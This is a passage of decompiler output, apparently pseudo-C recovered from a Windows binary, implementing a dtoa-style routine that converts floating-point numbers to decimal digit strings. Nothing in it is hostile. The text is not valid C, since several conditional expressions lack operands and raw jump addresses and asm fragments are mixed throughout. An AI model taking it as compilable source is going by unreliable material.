				unsigned long long _t973;
				intOrPtr _t976;
				intOrPtr* _t977;
				void* _t978;
				signed long long _t979;
				signed long long _t981;
				unsigned long long _t987;
				intOrPtr _t990;
				intOrPtr _t997;
				unsigned long long _t1000;
				unsigned long long _t1002;
				long long _t1010;
				char* _t1012;
				unsigned int _t1016;
				unsigned long long _t1017;
				intOrPtr _t1020;
				unsigned int* _t1021;
				char* _t1025;
				unsigned long long _t1029;
				signed long long _t1030;
				void* _t1032;
				intOrPtr _t1034;
				unsigned long long _t1037;
				unsigned long long _t1040;
				signed int* _t1043;
				signed int* _t1044;
				unsigned long long _t1045;
				signed long long _t1046;
				void* _t1049;
				signed long long _t1050;
				signed long long _t1051;
				unsigned long long _t1054;
				signed int _t1056;
				unsigned long long _t1058;
				intOrPtr _t1059;
				void* _t1060;
				signed int _t1065;
				signed int _t1066;
				unsigned long long _t1067;
				unsigned long long _t1069;
				signed int _t1078;
				unsigned int _t1079;
				void* _t1081;
				signed int _t1088;
				unsigned long long _t1093;
				char* _t1096;
				signed int* _t1098;

				_t677 =  *__rcx;
				if (_t677 - 0x20 <= 0) goto 0x7eed3e09;
				if (_t677 - 0x40 > 0) goto 0x7eed3e00;
				E00007FF67FF67EED55C0(1, __rax);
				_t922 =  *(_t1032 + 0xf0);
				_t1088 = __rax;
				_t3 = _t1088 + 0x18; // 0x18
				_t1045 = _t3;
				_t977 = _t922;
				_t978 = _t977 + 4;
				_t859 = _t1045 + 4;
				 *((intOrPtr*)(_t859 - 4)) =  *_t977;
				if (_t922 + __rax * 4 - _t978 >= 0) goto 0x7eed3e30;
				_t861 = _t859 - _t1045 >> 2;
				goto 0x7eed3e63;
				_t863 = __rax + _t861 * 4 - 4;
				_t616 = r14d;
				if (r14d == 0) goto 0x7eed3fc1;
				_t10 = _t978 - 1; // 0x13
				r14d = _t10;
				if ( *((intOrPtr*)(_t863 + 0x14)) == 0) goto 0x7eed3e53;
				 *(__rax + 0x14) = _t616;
				asm("inc ebx");
				r14d = _t616 << 5;
				r14d = r14d - (_t861 ^ 0x0000001f);
				_t432 = E00007FF67FF67EED5460(__rax);
				r12d =  *(_t1032 + 0xe8);
				 *(_t1032 + 0x7c) = _t432;
				if (_t432 != 0) goto 0x7eed3fd0;
				if ( *(_t1088 + 0x14) == 0) goto 0x7eed3d40;
				_t979 = _t1032 + 0x7c;
				E00007FF67FF67EED5D80(_t1088, _t979);
				_t435 = __r12 + r14d;
				_t17 = _t863 - 1; // -1
				r8d = _t17;
				asm("dec cx");
				asm("dec ax");
				asm("pxor xmm0, xmm0");
				_t1046 = _t1045 >> 0x20;
				asm("repne inc ecx");
				r9d = r9d & 0x000fffff;
				asm("mulsd xmm0, [0xc214]");
				r9d = r9d | 0x3ff00000;
				_t926 = _t1046 << 0x20;
				asm("dec ax");
				_t581 =  >=  ? r8d : 1 - _t435;
				asm("subsd xmm1, [0xc1d0]");
				asm("mulsd xmm1, [0xc1d0]");
				_t582 = ( >=  ? r8d : 1 - _t435) - 0x435;
				asm("addsd xmm1, [0xc1ca]");
				asm("addsd xmm1, xmm0");
				if (1 <= 0) goto 0x7eed3f4a;
				asm("pxor xmm0, xmm0");
				asm("cvtsi2sd xmm0, ecx");
				asm("mulsd xmm0, [0xc1c2]");
				asm("addsd xmm1, xmm0");
				asm("cvttsd2si ecx, xmm1");
				asm("pxor xmm6, xmm6");
				asm("comisd xmm6, xmm1");
				 *(_t1032 + 0x2c) = ( >=  ? r8d : 1 - _t435) - 0x435;
				if (1 > 0) goto 0x7eed4613;
				r10d =  *(_t1032 + 0x2c);
				_t927 = _t926 << 0x20;
				_t981 = _t979 | _t926 | _t927;
				_t729 = r10d - 0x16;
				_t1050 = _t981;
				 *(_t1032 + 0x60) = _t981;
				_t21 = _t927 - 1; // 0x13
				r9d = _t21;
				if (_t729 > 0) goto 0x7eed3ff1;
				_t1034 =  *0x7eee04b0; // 0x7ff67eee0180
				asm("dec cx");
				asm("repne inc ecx");
				asm("comisd xmm0, xmm5");
				if (_t729 <= 0) goto 0x7eed42a0;
				r10d = r10d - 1;
				 *(_t1032 + 0x5c) = 0;
				 *(_t1032 + 0x2c) = r10d;
				goto 0x7eed3ff9;
				 *(_t1088 + 0x14) = 0;
				goto 0x7eed3e87;
				L1();
				_t436 =  *(_t1032 + 0x7c);
				r12d =  *(_t1032 + 0xe8);
				r14d = r14d - _t436;
				r12d = r12d + _t436;
				goto 0x7eed3ea3;
				 *(_t1032 + 0x5c) = 1;
				 *(_t1032 + 0x48) = 0;
				if (r9d < 0) goto 0x7eed4600;
				if ( *(_t1032 + 0x2c) >= 0) goto 0x7eed42b9;
				_t588 =  *(_t1032 + 0x2c);
				 *(_t1032 + 0x2c) = 0;
				 *(_t1032 + 0x48) =  *(_t1032 + 0x48) - _t588;
				 *(_t1032 + 0x54) = _t588;
				 *(_t1032 + 0x58) =  ~_t588;
				if ( *(_t1032 + 0x100) - 9 > 0) goto 0x7eed42d1;
				if ( *(_t1032 + 0x100) - 5 > 0) goto 0x7eed4631;
				bpl = _t436 + 0x3fd - 0x7f7 < 0;
				_t735 =  *(_t1032 + 0x100) - 3;
				if (_t735 == 0) goto 0x7eed4ba0;
				if (_t735 <= 0) goto 0x7eed4740;
				if ( *(_t1032 + 0x100) != 4) goto 0x7eed4760;
				 *(_t1032 + 0x50) = 1;
				r11d =  *(_t1032 + 0x108);
				_t439 =  >  ?  *(_t1032 + 0x108) : 1;
				 *(_t1032 + 0x108) = 1;
				 *(_t1032 + 0x7c) = 1;
				 *(_t1032 + 0x6c) = 1;
				 *(_t1032 + 0x30) =  >  ?  *(_t1032 + 0x108) : 1;
				 *(_t1032 + 0x68) = r9d;
				E00007FF67FF67EED3A80(1, _t863);
				 *(_t1032 + 0x40) = _t863;
				r9d =  *(_t1032 + 0x68);
				 *(_t1032 + 0x38) =  *((intOrPtr*)(__rbx + 0xc)) - 1;
				if ( *(_t1032 + 0x30) == 0xe) goto 0x7eed4108;
				_t590 =  *(_t1032 + 0x38);
				_t445 =  >=  ? _t590 : 2;
				r13d = r13d & 0x00000008;
				 *(_t1032 + 0x38) =  >=  ? _t590 : 2;
				if (_t590 == 0) goto 0x7eed46c5;
				 *(_t1032 + 0x38) = 1;
				_t740 = bpl;
				if (_t740 == 0) goto 0x7eed46c5;
				r8d =  *(_t1032 + 0x38);
				r8d = r8d |  *(_t1032 + 0x54);
				if (_t740 != 0) goto 0x7eed46c5;
				r10d =  *(_t1032 + 0x5c);
				 *(_t1032 + 0x7c) = 0;
				asm("movsd xmm0, [esp+0x60]");
				_t741 = r10d;
				if (_t741 == 0) goto 0x7eed414b;
				asm("movsd xmm1, [0xbfd7]");
				asm("comisd xmm1, xmm0");
				if (_t741 > 0) goto 0x7eed4feb;
				asm("movapd xmm1, xmm0");
				asm("addsd xmm1, xmm0");
				asm("addsd xmm1, [0xbfd5]");
				asm("dec ax");
				asm("dec ax");
				_t864 = _t863 | r10d >> 0x00000020 << 0x00000020;
				if ( *(_t1032 + 0x30) == 0) goto 0x7eed4694;
				r10d =  *(_t1032 + 0x30);
				r11d = 0;
				r13d =  *(_t1032 + 0x50);
				asm("dec ax");
				_t743 = r13d;
				asm("movsd xmm4, [edx+eax*8]");
				if (_t743 == 0) goto 0x7eed4e34;
				asm("cvttsd2si eax, xmm0");
				asm("movsd xmm1, [0xbf93]");
				_t1025 =  *(_t1032 + 0x40);
				asm("divsd xmm1, xmm4");
				_t67 = _t864 + 0x30; // 0x3d
				 *_t1025 = _t67;
				asm("subsd xmm1, xmm2");
				asm("pxor xmm2, xmm2");
				asm("cvtsi2sd xmm2, eax");
				asm("subsd xmm0, xmm2");
				asm("comisd xmm1, xmm0");
				if (_t743 > 0) goto 0x7eed4270;
				asm("movsd xmm4, [0xbf26]");
				asm("movapd xmm2, xmm4");
				asm("subsd xmm2, xmm0");
				asm("comisd xmm1, xmm2");
				if (_t743 > 0) goto 0x7eed5346;
				_t451 =  *(_t1032 + 0x7c) + 1;
				_t744 = _t451 - r10d;
				 *(_t1032 + 0x7c) = _t451;
				if (_t744 >= 0) goto 0x7eed46bd;
				asm("movsd xmm3, [0xbf00]");
				goto 0x7eed4248;
				asm("movapd xmm2, xmm4");
				asm("subsd xmm2, xmm0");
				asm("comisd xmm1, xmm2");
				if (_t744 > 0) goto 0x7eed524b;
				_t453 =  *(_t1032 + 0x7c) + 1;
				_t745 = _t453 - r10d;
				 *(_t1032 + 0x7c) = _t453;
				if (_t745 >= 0) goto 0x7eed46bd;
				asm("mulsd xmm0, xmm3");
				asm("pxor xmm2, xmm2");
				_t930 = _t1025 + 2;
				asm("mulsd xmm1, xmm3");
				asm("cvttsd2si eax, xmm0");
				asm("cvtsi2sd xmm2, eax");
				 *((char*)(_t930 - 1)) = _t453 + 0x30;
				asm("subsd xmm0, xmm2");
				asm("comisd xmm1, xmm0");
				if (_t745 <= 0) goto 0x7eed4222;
				asm("ucomisd xmm0, xmm6");
				_t74 = _t1050 + 1; // 0x1
				 *(_t1032 + 0x2c) = _t74;
				_t865 =  *(_t1032 + 0x40);
				 *(_t1032 + 0x40) = _t930;
				if (_t745 != 0) goto 0x7eed428e;
				if (_t745 == 0) goto 0x7eed45af;
				r8d = 0x10;
				goto 0x7eed45af;
				_t746 = r9d;
				 *(_t1032 + 0x5c) = 0;
				 *(_t1032 + 0x48) = 0;
				if (_t746 < 0) goto 0x7eed4600;
				_t592 =  *(_t1032 + 0x2c);
				 *(_t1032 + 0x58) = 0;
				r9d = r9d + _t592;
				 *(_t1032 + 0x54) = _t592;
				goto 0x7eed4032;
				 *(_t1032 + 0x100) = 0;
				asm("pxor xmm0, xmm0");
				asm("cvtsi2sd xmm0, edi");
				 *(_t1032 + 0x30) = r9d;
				asm("mulsd xmm0, [0xbe1f]");
				asm("cvttsd2si ecx, xmm0");
				 *(_t1032 + 0x7c) = _t592 + 3;
				E00007FF67FF67EED3A80(_t592 + 3, _t865);
				r9d =  *(_t1032 + 0x30);
				 *(_t1032 + 0x40) = _t865;
				 *(_t1032 + 0x38) =  *((intOrPtr*)(__rbx + 0xc)) - 1;
				if (_t746 != 0) goto 0x7eed4640;
				if (r12d < 0) goto 0x7eed4d09;
				if ( *(_t1032 + 0x54) -  *((intOrPtr*)(__rbx + 0x14)) <= 0) goto 0x7eed4bc2;
				 *(_t1032 + 0x108) = 0;
				 *(_t1032 + 0x30) = 0xffffffff;
				 *(_t1032 + 0x6c) = 0xffffffff;
				_t594 =  *(__rbx + 4);
				_t624 = __rdi + 1;
				 *(_t1032 + 0x7c) = _t624;
				_t749 = r12d - _t677 - r14d - _t594;
				if (_t749 >= 0) goto 0x7eed4a50;
				if (_t749 == 0) goto 0x7eed4a50;
				r12d = r12d - _t594;
				_t679 =  *(_t1032 + 0x30);
				_t466 = __r12 + 1;
				 *(_t1032 + 0x7c) = _t466;
				if (((_t594 & 0xffffff00 |  *(_t1032 + 0x100) - 0x00000001 > 0x00000000) & (_t624 & 0xffffff00 | _t679 > 0x00000000)) == 0) goto 0x7eed43a9;
				if (_t466 - _t679 > 0) goto 0x7eed4a5e;
				_t596 =  *(_t1032 + 0x48);
				r9d = r9d + _t466;
				_t680 = _t596;
				 *(_t1032 + 0x48) = _t466 + _t596;
				 *(_t1032 + 0x68) = r9d;
				E00007FF67FF67EED57F0(1, _t865);
				r9d =  *(_t1032 + 0x68);
				 *(_t1032 + 0x50) = 1;
				if (_t680 <= 0) goto 0x7eed43fa;
				if (r9d <= 0) goto 0x7eed43fa;
				_t470 =  <=  ? _t680 : r9d;
				 *(_t1032 + 0x48) =  *(_t1032 + 0x48) - _t470;
				 *(_t1032 + 0x7c) = _t470;
				r9d = r9d - _t470;
				if ( *(_t1032 + 0x58) == 0) goto 0x7eed444e;
				if ( *(_t1032 + 0x50) == 0) goto 0x7eed4cb0;
				_t759 =  *(_t1032 + 0x58);
				if (_t759 <= 0) goto 0x7eed4442;
				 *(_t1032 + 0x68) = r9d;
				E00007FF67FF67EED5950( *(_t1032 + 0x58), _t759, _t865, _t865);
				E00007FF67FF67EED5820(_t680 - _t470, _t865, _t865, _t1088, _t1034, _t1050);
				_t1054 = _t865;
				0x7eed56c0();
				r9d =  *(_t1032 + 0x68);
				if (_t759 != 0) goto 0x7eed4d70;
				 *(_t1032 + 0x58) = r9d;
				_t474 = E00007FF67FF67EED57F0(1, _t865);
				r12b = r14d == 1;
				r9d =  *(_t1032 + 0x58);
				r12d = r12d & (_t474 & 0xffffff00 |  *(_t1032 + 0x100) - 0x00000001 <= 0x00000000);
				if ( *(_t1032 + 0x2c) > 0) goto 0x7eed47e2;
				 *(_t1032 + 0x58) = 0;
				if (r12b != 0) goto 0x7eed5087;
				r12d = 0x1f;
				if ( *(_t1032 + 0x2c) != 0) goto 0x7eed4803;
				r12d = r12d - r9d;
				r12d = r12d - 4;
				r12d = r12d & 0x0000001f;
				 *(_t1032 + 0x7c) = r12d;
				if ( *(_t1032 + 0x48) + r12d <= 0) goto 0x7eed44e1;
				 *(_t1032 + 0x2c) = r9d;
				E00007FF67FF67EED5AE0( *(_t1032 + 0x48) + r12d, _t865, _t1054, _t1088);
				r9d =  *(_t1032 + 0x2c);
				if (_t1046 + _t865 <= 0) goto 0x7eed44f4;
				E00007FF67FF67EED5AE0(_t1046 + _t865, _t865, _t865, _t1088);
				r14b =  *(_t1032 + 0x100) - 2 > 0;
				if ( *(_t1032 + 0x5c) != 0) goto 0x7eed4aa0;
				if ( *(_t1032 + 0x30) > 0) goto 0x7eed4820;
				if (r14b == 0) goto 0x7eed4820;
				_t682 =  *(_t1032 + 0x30);
				if (_t682 != 0) goto 0x7eed47c5;
				r8d = 0;
				E00007FF67FF67EED5730(5, _t704, _t865, _t865);
				_t987 = _t865;
				if (E00007FF67FF67EED5BD0(_t682, _t865, _t987) <= 0) goto 0x7eed47c5;
				 *(_t1032 + 0x2c) =  *(_t1032 + 0x54) + 2;
				_t866 =  *(_t1032 + 0x40);
				 *(_t1032 + 0x40) =  *(_t1032 + 0x40) + 1;
				 *_t866 = 0x31;
				r8d = 0x20;
				 *(_t1032 + 0x38) = _t866;
				 *(_t1032 + 0x30) = r8d;
				0x7eed56c0();
				r8d =  *(_t1032 + 0x30);
				if (_t865 == 0) goto 0x7eed45af;
				 *(_t1032 + 0x30) = r8d;
				0x7eed56c0();
				r8d =  *(_t1032 + 0x30);
				 *(_t1032 + 0x30) = r8d;
				0x7eed56c0();
				_t1010 =  *(_t1032 + 0x40);
				_t774 =  *((long long*)(_t1032 + 0x118));
				r8d =  *(_t1032 + 0x30);
				 *_t1010 = 0;
				 *( *(_t1032 + 0x110)) =  *(_t1032 + 0x2c);
				if (_t774 == 0) goto 0x7eed45f7;
				_t906 =  *((intOrPtr*)(_t1032 + 0x118));
				 *_t906 = _t1010;
				 *__rsi =  *__rsi | r8d;
				goto 0x7eed3d71;
				r9d = r9d ^ r9d;
				 *(_t1032 + 0x48) = 1;
				goto 0x7eed400a;
				asm("pxor xmm0, xmm0");
				asm("cvtsi2sd xmm0, ecx");
				asm("ucomisd xmm0, xmm1");
				if (_t774 != 0) goto 0x7eed4627;
				if (_t774 == 0) goto 0x7eed3f60;
				 *(_t1032 + 0x2c) =  *(_t1032 + 0x2c) - 1;
				goto 0x7eed3f60;
				 *(_t1032 + 0x100) =  *(_t1032 + 0x100) - 4;
				goto 0x7eed405e;
				 *(_t1032 + 0x50) = 1;
				 *(_t1032 + 0x6c) = 0xffffffff;
				 *(_t1032 + 0x30) = 0xffffffff;
				 *(_t1032 + 0x108) = 0;
				goto 0x7eed40df;
				asm("movapd xmm1, xmm0");
				asm("addsd xmm1, xmm0");
				asm("addsd xmm1, [0xbab9]");
				asm("dec ax");
				asm("dec ax");
				asm("subsd xmm0, [0xba9c]");
				asm("dec ax");
				asm("comisd xmm0, xmm1");
				if (_t774 > 0) goto 0x7eed50b0;
				asm("xorpd xmm1, [0xba8d]");
				asm("comisd xmm1, xmm0");
				if (_t774 > 0) goto 0x7eed47c0;
				 *(_t1032 + 0x38) = 0;
				if (r12d < 0) goto 0x7eed47a0;
				if ( *((intOrPtr*)(_t906 + 0x14)) -  *(_t1032 + 0x54) < 0) goto 0x7eed47a0;
				r8d =  *(_t1032 + 0x108);
				_t990 =  *0x7eee04b0; // 0x7ff67eee0180
				asm("movsd xmm2, [edx+eax*8]");
				if (r8d >= 0) goto 0x7eed4be0;
				_t778 =  *(_t1032 + 0x30);
				if (_t778 > 0) goto 0x7eed4be0;
				if (_t778 != 0) goto 0x7eed47c0;
				asm("mulsd xmm2, [0xba21]");
				asm("comisd xmm2, [esp+0x60]");
				if (_t778 >= 0) goto 0x7eed47c0;
				r13d = 0;
				 *(_t1032 + 0x2c) = _t682 + 2;
				goto 0x7eed4563;
				if ( *(_t1032 + 0x100) != 2) goto 0x7eed42dc;
				 *(_t1032 + 0x50) = 0;
				goto 0x7eed4088;
				if ( *(_t1032 + 0x100) != 5) goto 0x7eed42dc;
				 *(_t1032 + 0x50) = 1;
				_t492 =  *(_t1032 + 0x54) +  *(_t1032 + 0x108);
				 *(_t1032 + 0x6c) = _t492;
				_t493 = _t492 + 1;
				 *(_t1032 + 0x30) = _t493;
				if (_t493 <= 0) goto 0x7eed4bb0;
				 *(_t1032 + 0x7c) = _t493;
				goto 0x7eed40b5;
				if ( *(_t1032 + 0x50) != 0) goto 0x7eed4350;
				r13d = 0;
				goto 0x7eed43db;
				r13d = r13d ^ r13d;
				r8d = 0x10;
				 *(_t1032 + 0x2c) =  ~( *(_t1032 + 0x108));
				_t873 =  *(_t1032 + 0x40);
				goto 0x7eed4572;
				E00007FF67FF67EED5950(0xfffffffffcc00000,  *(_t1032 + 0x50), _t873, _t865);
				r9d =  *(_t1032 + 0x58);
				_t1029 = _t873;
				if (r12b != 0) goto 0x7eed510c;
				 *(_t1032 + 0x58) = 0;
				asm("inc esp");
				r12d = r12d ^ 0x0000001f;
				goto 0x7eed44aa;
				asm("o16 nop [eax+eax]");
				 *(_t1032 + 0x2c) =  *(_t1032 + 0x54) + 1;
				if ( *(_t1032 + 0x50) == 0) goto 0x7eed4b00;
				if (_t1054 + ( *(_t1032 + 0x38) | _t987 >> 0x00000020 << 0x00000020) <= 0) goto 0x7eed484a;
				E00007FF67FF67EED5AE0(_t1054 + ( *(_t1032 + 0x38) | _t987 >> 0x00000020 << 0x00000020), _t873, _t865, _t990);
				_t1064 = _t873;
				r11d =  *(_t1032 + 0x58);
				if (r11d != 0) goto 0x7eed504d;
				 *((long long*)(_t1032 + 0xf8)) = __rsi;
				 *(_t1032 + 0x7c) = 1;
				goto 0x7eed4922;
				0x7eed56c0();
				r8d = 1;
				_t787 = r14d;
				if (_t787 < 0) goto 0x7eed4f0b;
				r14d = r14d |  *(_t1032 + 0x100);
				if (_t787 != 0) goto 0x7eed48b2;
				_t875 =  *(_t1032 + 0xf0);
				if (( *_t875 & 0x00000001) == 0) goto 0x7eed4f0b;
				_t907 =  *(_t1032 + 0x40) + 1;
				if (r8d <= 0) goto 0x7eed48c6;
				if ( *(_t1032 + 0x38) != 2) goto 0x7eed50c7;
				 *(_t907 - 1) = dil;
				if ( *(_t1032 + 0x7c) ==  *(_t1032 + 0x30)) goto 0x7eed50f9;
				r8d = 0;
				E00007FF67FF67EED5730(0xa, _t704, _t875, _t865);
				r8d = 0;
				if (_t873 == _t873) goto 0x7eed4a40;
				E00007FF67FF67EED5730(0xa, _t704, _t875, _t873);
				r8d = 0;
				_t1065 = _t875;
				E00007FF67FF67EED5730(0xa, _t704, _t875, _t1064);
				_t1056 = _t875;
				 *(_t1032 + 0x7c) =  *(_t1032 + 0x7c) + 1;
				_t1016 = _t907;
				_t507 = E00007FF67FF67EED3B60(_t875, _t875, _t1029, _t1034);
				_t216 = _t875 + 0x30; // 0x30
				r14d = E00007FF67FF67EED5BD0(_t873 - _t873, _t875, _t1065);
				E00007FF67FF67EED5C10(_t508, _t873 - _t873, _t1029, _t1056);
				r10d =  *(_t875 + 0x10);
				_t793 = r10d;
				if (_t793 != 0) goto 0x7eed4880;
				 *(_t1032 + 0x48) = _t875;
				 *(_t1032 + 0x50) = E00007FF67FF67EED5BD0(_t793, _t875, _t875);
				0x7eed56c0();
				r8d =  *(_t1032 + 0x50);
				r8d = r8d |  *(_t1032 + 0x100);
				if (_t793 != 0) goto 0x7eed536c;
				 *(_t1032 + 0x50) =  *( *(_t1032 + 0xf0));
				if (_t793 != 0) goto 0x7eed488e;
				 *(_t1032 + 0x50) = _t507;
				 *(_t1032 + 0x30) = _t1016;
				_t1017 =  *((intOrPtr*)(_t1032 + 0xf8));
				if (_t216 == 0x39) goto 0x7eed517c;
				if (r14d <= 0) goto 0x7eed5334;
				r8d = 0x20;
				_t1078 = _t1065;
				_t1066 = _t1056;
				 *( *(_t1032 + 0x30)) = dil;
				 *(_t1032 + 0x30) = r8d;
				0x7eed56c0();
				r8d =  *(_t1032 + 0x30);
				if (_t1066 == 0) goto 0x7eed4d60;
				if (_t1078 == 0) goto 0x7eed51aa;
				if (_t1078 == _t1066) goto 0x7eed51aa;
				0x7eed56c0();
				_t879 =  *(_t1032 + 0x40);
				 *(_t1032 + 0x40) = _t1016 + 1;
				r8d =  *(_t1032 + 0x30);
				goto 0x7eed4593;
				E00007FF67FF67EED5730(0xa, _t704, _t879, _t1078);
				_t1067 = _t879;
				goto 0x7eed491a;
				if ( *(_t1032 + 0x100) - 1 <= 0) goto 0x7eed4d40;
				if ( *(_t1032 + 0x58) -  *(_t1032 + 0x30) - 1 < 0) goto 0x7eed4d8a;
				_t518 =  *(_t1032 + 0x30);
				if (_t518 < 0) goto 0x7eed4fd6;
				 *(_t1032 + 0x7c) = _t518;
				r9d = r9d + _t518;
				 *(_t1032 + 0x48) = _t518 +  *(_t1032 + 0x48);
				goto 0x7eed43bc;
				if (E00007FF67FF67EED5BD0(_t518, _t875, _t1029) >= 0) goto 0x7eed450c;
				r8d = 0;
				E00007FF67FF67EED5730(0xa, _t704, _t879, _t875);
				r14d = r14d & ( *(_t1032 + 0x6c) & 0xffffff00 |  *(_t1032 + 0x6c) <= 0x00000000);
				if ( *(_t1032 + 0x50) != 0) goto 0x7eed5262;
				if (r14b != 0) goto 0x7eed5199;
				 *(_t1032 + 0x2c) =  *(_t1032 + 0x54);
				 *(_t1032 + 0x30) =  *(_t1032 + 0x6c);
				 *(_t1032 + 0x7c) = 1;
				r12d =  *(_t1032 + 0x30);
				goto 0x7eed4b2c;
				r8d = 0;
				E00007FF67FF67EED5730(0xa, _t704, _t879, _t879);
				 *(_t1032 + 0x7c) =  *(_t1032 + 0x7c) + 1;
				_t1093 = _t879;
				E00007FF67FF67EED3B60(_t879, _t1093, _t1029,  *(_t1032 + 0x48));
				_t910 =  *(_t1032 + 0x40) + 1;
				_t259 = _t879 + 0x30; // 0x30
				 *(_t910 - 1) = dil;
				if ( *(_t1032 + 0x7c) - r12d < 0) goto 0x7eed4b14;
				r14d = 0;
				_t602 =  *(_t1032 + 0x38);
				if (_t602 == 0) goto 0x7eed4db7;
				if (_t602 == 2) goto 0x7eed4ded;
				if ( *((intOrPtr*)(_t1093 + 0x14)) - 1 > 0) goto 0x7eed4cd0;
				if ( *((intOrPtr*)(_t1093 + 0x18)) != 0) goto 0x7eed4cd0;
				r8d = 0;
				goto 0x7eed4b8a;
				_t811 = ( *(_t910 - 2) & 0x000000ff) - 0x30;
				if (_t811 == 0) goto 0x7eed4b83;
				goto 0x7eed49f0;
				 *(_t1032 + 0x50) = 0;
				goto 0x7eed4776;
				 *(_t1032 + 0x7c) = 1;
				goto 0x7eed40b5;
				_t881 =  *(_t1032 + 0x54);
				 *(_t1032 + 0x30) = 0xffffffff;
				_t997 =  *0x7eee04b0; // 0x7ff67eee0180
				asm("movsd xmm2, [edx+eax*8]");
				asm("movsd xmm0, [esp+0x60]");
				 *(_t1032 + 0x7c) = 1;
				asm("movapd xmm1, xmm0");
				_t1012 =  *(_t1032 + 0x40);
				asm("divsd xmm1, xmm2");
				 *(_t1032 + 0x2c) =  *(_t1032 + 0x54) + 1;
				asm("cvttsd2si eax, xmm1");
				asm("pxor xmm1, xmm1");
				asm("cvtsi2sd xmm1, eax");
				 *_t1012 = _t881 + 0x30;
				asm("mulsd xmm1, xmm2");
				asm("subsd xmm0, xmm1");
				asm("ucomisd xmm0, xmm6");
				if (_t811 != 0) goto 0x7eed530a;
				r9d =  *(_t1032 + 0x30);
				if ( *(_t1032 + 0x7c) == r9d) goto 0x7eed4e10;
				asm("movsd xmm3, [0xb4d9]");
				goto 0x7eed4c5d;
				_t648 =  *(_t1032 + 0x7c);
				_t813 = _t648 - r9d;
				if (_t813 == 0) goto 0x7eed4e10;
				asm("mulsd xmm0, xmm3");
				_t1037 = _t1012 + 2;
				 *(_t1032 + 0x7c) = _t648 + 1;
				asm("movapd xmm1, xmm0");
				asm("divsd xmm1, xmm2");
				asm("cvttsd2si eax, xmm1");
				asm("pxor xmm1, xmm1");
				asm("cvtsi2sd xmm1, eax");
				 *((char*)(_t1037 - 1)) = _t881 + 0x30;
				asm("mulsd xmm1, xmm2");
				asm("subsd xmm0, xmm1");
				asm("ucomisd xmm0, xmm6");
				if (_t813 != 0) goto 0x7eed4c50;
				if (_t813 != 0) goto 0x7eed4c50;
				_t882 =  *(_t1032 + 0x40);
				 *(_t1032 + 0x40) = _t1037;
				r8d = 0;
				goto 0x7eed45af;
				 *(_t1032 + 0x68) = r9d;
				E00007FF67FF67EED5950( *(_t1032 + 0x58), _t813, _t882, _t1093);
				r9d =  *(_t1032 + 0x68);
				goto 0x7eed444e;
				goto 0x7eed4cf0;
				asm("o16 nop [eax+eax]");
				if (_t882 ==  *(_t1032 + 0x40)) goto 0x7eed4d9f;
				_t652 =  *(_t882 - 1) & 0x000000ff;
				_t912 = _t882;
				if (_t652 == 0x39) goto 0x7eed4ce0;
				r8d = 0x20;
				 *(_t912 - 1) = _t652 + 1;
				goto 0x7eed49f0;
				 *(_t1032 + 0x108) = 0;
				_t654 = _t1012 + 1;
				 *(_t1032 + 0x7c) = _t654;
				 *(_t1032 + 0x6c) = 0xffffffff;
				 *(_t1032 + 0x30) = 0xffffffff;
				if (r12d - _t259 - r14d -  *((intOrPtr*)(_t912 + 4)) < 0) goto 0x7eed436a;
				r9d = r9d + _t654;
				 *(_t1032 + 0x48) =  *(_t1032 + 0x48) + _t654;
				goto 0x7eed43bc;
				 *(_t1032 + 0x40) = _t912;
				goto 0x7eed45af;
				 *(_t1032 + 0x58) = r9d;
				_t538 = E00007FF67FF67EED5950(_t654, r12d - _t259 - r14d -  *((intOrPtr*)(_t912 + 4)),  *(_t1032 + 0x40), _t882);
				r9d =  *(_t1032 + 0x58);
				goto 0x7eed444e;
				 *(_t1032 + 0x58) = _t538;
				 *(_t1032 + 0x2c) =  *(_t1032 + 0x2c) + _t538 -  *(_t1032 + 0x58);
				goto 0x7eed4a75;
				_t885 =  *(_t1032 + 0x40);
				r8d = 0x20;
				 *(_t1032 + 0x2c) =  *(_t1032 + 0x2c) + 1;
				 *_t885 = 0x31;
				goto 0x7eed49f0;
				E00007FF67FF67EED5AE0(1, _t885,  *(_t1032 + 0x40), _t997);
				_t1096 = _t885;
				_t817 = E00007FF67FF67EED5BD0(r12d - _t259 - r14d -  *((intOrPtr*)(_t912 + 4)), _t885, _t1029);
				if (_t817 > 0) goto 0x7eed4cd0;
				if (_t817 != 0) goto 0x7eed4de9;
				if (_t817 != 0) goto 0x7eed4cd0;
				_t541 =  *((intOrPtr*)(_t1096 + 0x14));
				r8d = 0x10;
				if (_t541 - 1 > 0) goto 0x7eed4b8a;
				asm("inc ebp");
				r8d =  !r8d;
				r8d = r8d & 0x00000010;
				goto 0x7eed4b8a;
				_t574 =  *(_t1032 + 0x38);
				if (_t574 == 0) goto 0x7eed5211;
				if (_t574 == 1) goto 0x7eed5293;
				 *(_t1032 + 0x40) = _t1037;
				goto 0x7eed428e;
				asm("mulsd xmm4, xmm2");
				asm("movapd xmm1, xmm0");
				r8d = 0;
				 *(_t1032 + 0x7c) = 1;
				asm("movsd xmm2, [0xb2cc]");
				goto 0x7eed4e6e;
				asm("o16 nop [cs:eax+eax]");
				asm("mulsd xmm1, xmm2");
				r8d = 0;
				 *(_t1032 + 0x7c) = ( *(_t912 - 1) & 0x000000ff) + 1;
				asm("cvttsd2si eax, xmm1");
				if (_t541 == 0) goto 0x7eed4e85;
				asm("pxor xmm3, xmm3");
				asm("cvtsi2sd xmm3, eax");
				r8d = 0;
				asm("subsd xmm1, xmm3");
				 *((char*)( *(_t1032 + 0x40) + 1 - 1)) = _t541 + 0x30;
				if ( *(_t1032 + 0x7c) != r10d) goto 0x7eed4e60;
				_t824 = r8b;
				if (_t824 == 0) goto 0x7eed4ea3;
				asm("movapd xmm0, xmm1");
				asm("movsd xmm1, [0xb2a5]");
				asm("movapd xmm2, xmm4");
				asm("addsd xmm2, xmm1");
				asm("comisd xmm0, xmm2");
				if (_t824 > 0) goto 0x7eed51b9;
				asm("subsd xmm1, xmm4");
				asm("comisd xmm1, xmm0");
				if (_t824 <= 0) goto 0x7eed46bd;
				asm("ucomisd xmm0, xmm6");
				if (_t824 != 0) goto 0x7eed4edf;
				if (_t824 == 0) goto 0x7eed5315;
				_t324 = _t1050 + 1; // 0x1
				r8d = 0x10;
				goto 0x7eed4ef3;
				_t1000 = _t1046;
				if ( *((char*)(_t1000 - 1)) == 0x30) goto 0x7eed4ef0;
				 *(_t1032 + 0x40) = _t1000;
				 *(_t1032 + 0x2c) = _t324;
				goto 0x7eed45af;
				r9d =  *(_t1032 + 0x38);
				_t888 = _t1017;
				 *(_t1032 + 0x50) = _t574;
				_t1079 = _t888 + 1;
